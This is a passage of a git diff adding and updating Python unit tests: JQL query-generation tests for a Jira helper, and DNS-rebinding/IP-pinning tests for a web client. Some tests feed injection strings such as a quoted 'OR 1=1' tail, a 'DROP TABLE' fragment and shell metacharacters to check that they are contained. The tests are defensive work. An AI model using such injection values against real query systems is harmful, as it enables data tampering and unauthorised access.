'issuetype = "Bug"' + ORDER_SUFFIX + ) + + def test_status_template(self): + assert ( + generate_jql_from_templates("in progress") + == 'status = "In Progress"' + ORDER_SUFFIX + ) + + def test_assignment_function_template(self): + assert ( + generate_jql_from_templates("assigned to me") + == "assignee = currentUser()" + ORDER_SUFFIX + ) + + def test_all_template_values_quote_literal_strings(self): + # Every literal-string template either quotes its value or uses a + # JQL function / operator. This is the convention the module relies on + # for safety. We assert the literal-value templates are quoted. + for key in ("bug", "story", "task", "epic", "blocker", "critical", "closed"): + jql = JQL_TEMPLATES[key] + # The right-hand value is wrapped in double quotes. + assert '"' in jql, f"template {key!r} should quote its value: {jql!r}" + + +# --------------------------------------------------------------------------- +# Composite patterns (only reached when no plain template matched) +# --------------------------------------------------------------------------- + + +class TestCompositePatterns: + def test_composite_only_when_no_plain_template_matches(self): + # "critical bugs" contains the plain template substring "bug", which is + # matched first (the plain-template loop runs before composites and + # breaks on first hit). Documents the actual precedence. + out = generate_jql_from_templates("critical bugs") + assert out == 'issuetype = "Bug"' + ORDER_SUFFIX + + def test_every_composite_key_is_shadowed_by_a_plain_template(self): + # Observation test (documents current behavior, not a desired guard): + # every key in COMPOSITE_PATTERNS contains a plain-template substring + # ("bug", "open", "task", "story", ...) that the earlier plain-template + # loop matches and breaks on first. As a result the composite branch is + # never reached for these keys today. If a future change makes a + # composite reachable, this test will flag the behavior shift. + for key in COMPOSITE_PATTERNS: + body = generate_jql_from_templates(key).split(" ORDER BY")[0] + assert body != COMPOSITE_PATTERNS[key], ( + f"composite {key!r} unexpectedly reached the composite branch; " + "precedence assumption changed" + ) + + +# --------------------------------------------------------------------------- +# Regex patterns: project, story points, dates +# --------------------------------------------------------------------------- + + +class TestRegexPatterns: + def test_project_key_uppercased(self): + out = generate_jql_from_templates("issues in proj project") + assert "project = PROJ" in out + + def test_story_points_comparison(self): + out = generate_jql_from_templates("story points > 5") + assert '"Story Points" > 5' in out + + def test_created_after_date_quoted(self): + out = generate_jql_from_templates("created after 2024-01-15") + assert 'created >= "2024-01-15"' in out + + def test_assignee_email_quoted(self): + out = generate_jql_from_templates("assigned to alice@example.com") + assert 'assignee = "alice@example.com"' in out + + def test_quoted_phrase_becomes_text_search(self): + out = generate_jql_from_templates('search for "login timeout"') + assert 'text ~ "login timeout"' in out + + +# --------------------------------------------------------------------------- +# Labels and teams +# --------------------------------------------------------------------------- + + +class TestLabelsAndTeams: + def test_label_mapping_expands(self): + out = generate_jql_from_templates("security issues") + # Label set is unordered; assert each expected label is present. + assert "labels in (" in out + for label in LABEL_MAPPINGS["security"]: + assert f'"{label}"' in out + + def test_team_membership_pattern(self): + out = generate_jql_from_templates("backend team work") + assert 'assignee in membersOf("backend-team")' in out + + +# --------------------------------------------------------------------------- +# OR vs AND combination +# --------------------------------------------------------------------------- + + +class TestCombination: + def test_or_keyword_joins_with_or(self): + # Two regex parts joined; presence of " or " switches the joiner. + out = generate_jql_from_templates("story points > 5 or story points < 1") + assert " OR " in out + assert " AND " not in out.split(" ORDER BY")[0] + + def test_default_joins_with_and(self): + out = generate_jql_from_templates("bugs assigned to bob@example.com") + body = out.split(" ORDER BY")[0] + assert " AND " in body + + +# --------------------------------------------------------------------------- +# SECURITY: injection surface — restrictive capture classes contain the value +# --------------------------------------------------------------------------- + + +class TestInjectionContainment: + def test_project_key_injection_chars_dropped(self): + # The project regex captures only [A-Z0-9]+, so trailing quote / boolean + # injection chars are not part of the value. `project = PROJ` is emitted + # unquoted but cannot be poisoned because the value is alphanumeric only. + out = generate_jql_from_templates('project PROJ" OR 1=1') + body = out.split(" ORDER BY")[0] + assert "project = PROJ" in body + # The injected boolean tail did not become part of the project clause. + assert "1=1" not in body + + def test_assignee_email_injection_bounded_by_charclass(self): + # The email char class [a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+ stops at the + # first non-matching char, so a closing quote / OR cannot land *inside* + # the assignee value's quotes. + out = generate_jql_from_templates('assigned to evil@example.com" OR "1"="1') + # The assignee clause quotes exactly the email, nothing more. + assert 'assignee = "evil@example.com"' in out + # The injected boolean did not fuse into the assignee value. + assert 'assignee = "evil@example.com" OR "1"="1"' not in out + + def test_assignee_value_has_no_unescaped_break_in_clause(self): + out = generate_jql_from_templates("assigned to user@corp.io") + # Exactly one assignee clause with a single quoted value. + assert out.count('assignee = "') == 1 + clause = 'assignee = "user@corp.io"' + assert clause in out + + def test_story_points_only_accepts_digits(self): + # The Story Points comparison regex requires \d+, so a non-numeric + # "value" never reaches it and the injected text is not interpolated + # into a "Story Points" comparison clause. + out = generate_jql_from_templates("story points > abc; DROP TABLE") + assert '"Story Points" >' not in out + assert "DROP TABLE" not in out + + def test_no_shell_or_jql_metachars_leak_for_garbage_input(self): + # Pure garbage with metacharacters falls through to the safe default. + out = generate_jql_from_templates(";`$(){}[]<>") + assert out == "created >= -30d" + ORDER_SUFFIX + + +# --------------------------------------------------------------------------- +# Structural sanity of the static tables +# --------------------------------------------------------------------------- + + +class TestStaticTables: + def test_regex_patterns_are_callable_pairs(self): + for pattern, generator in REGEX_PATTERNS: + assert isinstance(pattern, str) + assert callable(generator) + + def test_order_patterns_start_with_order_by(self): + for clause in ORDER_PATTERNS.values(): + assert clause.startswith("ORDER BY ") + + def test_composite_patterns_combine_conditions(self): + # Each composite has at least one boolean joiner or function call. + for jql in COMPOSITE_PATTERNS.values(): + assert " AND " in jql or " OR " in jql or "(" in jql + + def test_team_patterns_use_membersof(self): + for jql in TEAM_PATTERNS.values(): + assert "membersOf(" in jql diff --git a/tests/unit/test_web_client_ip_pinning.py b/tests/unit/test_web_client_ip_pinning.py index 4b53ae98c..07385424c 100644 --- a/tests/unit/test_web_client_ip_pinning.py +++ b/tests/unit/test_web_client_ip_pinning.py @@ -2,9 +2,10 @@ import threading from unittest.mock import MagicMock, patch +import pytest import requests -from gaia.web.client import PinnedIPAdapter +from gaia.web.client import PinnedIPAdapter, WebClient def test_ip_pinning_blocks_rebind_to_private_ip(monkeypatch): @@ -16,7 +17,7 @@ def test_ip_pinning_blocks_rebind_to_private_ip(monkeypatch): def fake_getaddrinfo(host, port, *args, **kwargs): calls["count"] += 1 if calls["count"] == 1: - return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("203.0.113.10", port))] + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("8.8.8.8", port))] return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("10.0.0.5", port))] monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) @@ -36,12 +37,12 @@ def fake_getaddrinfo(host, port, *args, **kwargs): resp = adapter.send(req) # Adapter should have rewritten the URL to use the first resolved IP - assert "203.0.113.10" in req.url + assert "8.8.8.8" in req.url assert resp.status_code == 200 # Cache should store the resolved IP key = ("example.local", 80) - assert adapter._pinned_cache.get(key) == "203.0.113.10" + assert adapter._pinned_cache.get(key) == "8.8.8.8" def test_ip_pinning_prevents_dns_rebind(monkeypatch): @@ -52,7 +53,7 @@ def test_ip_pinning_prevents_dns_rebind(monkeypatch): def fake_getaddrinfo(host, port, *args, **kwargs): states["calls"] += 1 if states["calls"] == 1: - return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("198.51.100.7", port))] + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("8.8.8.8", port))] # Rebind to loopback on later calls return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("127.0.0.1", port))] @@ -65,18 +66,18 @@ def fake_getaddrinfo(host, port, *args, **kwargs): mock_response._content = b"ok" with patch.object(PinnedIPAdapter.__bases__[0], "send", return_value=mock_response): - # First request pins 198.51.100.7 + # First request pins 8.8.8.8 r1_req = requests.Request("GET", "http://example.local/first").prepare() mock_response.request = r1_req adapter.send(r1_req) - assert "198.51.100.7" in r1_req.url + assert "8.8.8.8" in r1_req.url # Second request — getaddrinfo would return 127.0.0.1, - # but adapter uses cached 198.51.100.7 + # but adapter uses cached 8.8.8.8 r2_req = requests.Request("GET", "http://example.local/second").prepare() mock_response.request = r2_req adapter.send(r2_req) - assert "198.51.100.7" in r2_req.url + assert "8.8.8.8" in r2_req.url def test_https_pinning_preserves_tls_hostname(monkeypatch): @@ -143,9 +144,9 @@ def test_concurrent_https_requests_use_correct_tls_hostname(monkeypatch): def fake_getaddrinfo(host, port, *args, **kwargs): ips = { "alpha.example.com": "93.184.216.34", - "beta.example.com": "198.51.100.1", + "beta.example.com": "1.1.1.1", } - ip = ips.get(host, "203.0.113.1") + ip = ips.get(host, "8.8.8.8") return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))] monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) @@ -154,36 +155,40 @@ def fake_getaddrinfo(host, port, *args, **kwargs): results = {} errors = [] + mock_resp = requests.Response() + mock_resp.status_code = 200 + mock_resp._content = b"ok" + def make_request(hostname): try: req = requests.Request("GET", f"https://{hostname}/path").prepare() - mock_resp = requests.Response() - mock_resp.status_code = 200 - mock_resp._content = b"ok" - mock_resp.request = req - - with patch.object( - PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp - ): - adapter.send(req) - - mock_pool = MagicMock() - with patch.object( - PinnedIPAdapter.__bases__[0], "get_connection", return_value=mock_pool - ): - pool = adapter.get_connection(req.url) + adapter.send(req) + pool = adapter.get_connection(req.url) results[hostname] = pool.assert_hostname except Exception as exc: errors.append(exc) - threads = [ - threading.Thread(target=make_request, args=("alpha.example.com",)), - threading.Thread(target=make_request, args=("beta.example.com",)), - ] - for t in threads: - t.start() - for t in threads: - t.join() + # Install the transport + pool-factory patches ONCE around both threads. + # Patching a shared class method inside each thread races on install/ + # teardown and can leak a real network call; a single install is safe. + # get_connection returns a FRESH mock per call so each request gets its + # own pool — the per-hostname isolation under test. + with ( + patch.object(PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp), + patch.object( + PinnedIPAdapter.__bases__[0], + "get_connection", + side_effect=lambda *a, **k: MagicMock(), + ), + ): + threads = [ + threading.Thread(target=make_request, args=("alpha.example.com",)), + threading.Thread(target=make_request, args=("beta.example.com",)), + ] + for t in threads: + t.start() + for t in threads: + t.join() assert not errors, f"Threads raised: {errors}" assert results["alpha.example.com"] == "alpha.example.com" @@ -206,39 +211,43 @@ def fake_getaddrinfo(host, port, *args, **kwargs): errors = [] barrier = threading.Barrier(2, timeout=5) + mock_resp = requests.Response() + mock_resp.status_code = 200 + mock_resp._content = b"ok" + def make_request(hostname): try: req = requests.Request("GET", f"https://{hostname}/path").prepare() - mock_resp = requests.Response() - mock_resp.status_code = 200 - mock_resp._content = b"ok" - mock_resp.request = req - - with patch.object( - PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp - ): - adapter.send(req) + adapter.send(req) # Synchronize so both threads call get_connection concurrently barrier.wait() - mock_pool = MagicMock() - with patch.object( - PinnedIPAdapter.__bases__[0], "get_connection", return_value=mock_pool - ): - pool = adapter.get_connection(req.url) + pool = adapter.get_connection(req.url) results[hostname] = pool.assert_hostname except Exception as exc: errors.append(exc) - threads = [ - threading.Thread(target=make_request, args=("site-a.example.com",)), - threading.Thread(target=make_request, args=("site-b.example.com",)), - ] - for t in threads: - t.start() - for t in threads: - t.join() + # Single install of the patches (see sibling test): per-thread context + # managers race on teardown and can leak a real connection. A fresh mock + # pool per get_connection call proves each host keeps its own + # assert_hostname even though both resolve to the same pinned IP. + with ( + patch.object(PinnedIPAdapter.__bases__[0], "send", return_value=mock_resp), + patch.object( + PinnedIPAdapter.__bases__[0], + "get_connection", + side_effect=lambda *a, **k: MagicMock(), + ), + ): + threads = [ + threading.Thread(target=make_request, args=("site-a.example.com",)), + threading.Thread(target=make_request, args=("site-b.example.com",)), + ] + for t in threads: + t.start() + for t in threads: + t.join() assert not errors, f"Threads raised: {errors}" # Even though both resolve to the same IP, each gets its own hostname @@ -261,3 +270,106 @@ def test_strip_tls_host_without_userinfo(): clean, hostname = PinnedIPAdapter._strip_tls_host(url) assert hostname is None assert clean == url + + +# ============================================================================ +# DNS-rebind TOCTOU: validate_url sees a PUBLIC IP, the adapter's own lookup +# sees a PRIVATE IP. The adapter must validate the IP it actually pins/dials +# and BLOCK — not connect to the private address. +# ============================================================================ + + +def test_adapter_blocks_rebind_when_pinned_ip_is_private(monkeypatch): + """The adapter's own resolution returns a private IP — pinning + must reject it rather than caching/dialing it. + + ``_resolve_first_ip`` performs a single ``getaddrinfo``, so the fixture + returns the rebound private IP directly: the contract under test is that + the adapter validates the exact address it is about to pin/dial. + """ + + def fake_getaddrinfo(host, port, *args, **kwargs): + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("10.0.0.5", port))] + + monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) + + adapter = PinnedIPAdapter() + # super().send must NOT be reached — validation happens before connect. + with patch.object( + PinnedIPAdapter.__bases__[0], "send", side_effect=AssertionError("connected!") + ): + with pytest.raises(ValueError, match="private/reserved IP"): + adapter._resolve_first_ip("example.local", 80) + + # Poisoned IP must NOT be cached — a later safe lookup should be retryable. + assert ("example.local", 80) not in adapter._pinned_cache + + +def test_full_request_blocked_when_rebind_returns_private_ip(monkeypatch): + """End-to-end through WebClient.get: validate_url's resolution returns a + public IP (passes the pre-flight), but the adapter's resolution returns a + private IP. The fetch must raise and NEVER reach the transport.""" + calls = {"count": 0} + + def fake_getaddrinfo(host, port=None, *args, **kwargs): + calls["count"] += 1 + # Call 1 = WebClient.validate_url -> _validate_host_ip (public, OK). + # Call 2 = PinnedIPAdapter._resolve_first_ip (rebound to private). + if calls["count"] == 1: + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("8.8.8.8", 0))] + return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("10.0.0.5", port or 0))] + + monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) + + client = WebClient() + try: + # Patch the underlying transport so a "successful" connect would be + # observable — it must never be invoked. + with patch.object( + PinnedIPAdapter.__bases__[0], + "send", + side_effect=AssertionError("transport reached private IP"), + ): + with pytest.raises(ValueError, match="private/reserved IP"): + client.get("http://rebind.example/path") + finally: + client.close() + + +def test_full_request_succeeds_for_public_host(monkeypatch): + """Positive path: a normal public host resolves to a public IP on both + lookups and the request completes through the (mocked) transport.""" + + def fake_getaddrinfo(host, port=None, *args, **kwargs): + return [ + (socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port or 0)) + ] + + monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo) + + client = WebClient() + try: + mock_response = requests.Response() + mock_response.status_code = 200 + mock_response.headers["Content-Type"] = "text/html" + mock_response._content = b"
ok
" + mock_response._content_consumed = True + mock_response.encoding = "utf-8" + + with patch.object( + PinnedIPAdapter.__bases__[0], "send", return_value=mock_response + ): + with patch.object(client, "_rate_limit_wait"): + resp = client.get("http://public.example/page") + + assert resp.status_code == 200 + assert b"ok" in resp.content + # Adapter pinned the validated public IP. + assert ( + client._session.get_adapter("http://public.example/")._pinned_cache[ + ("public.example", 80) + ] + == "93.184.216.34" + ) + finally: + client.close()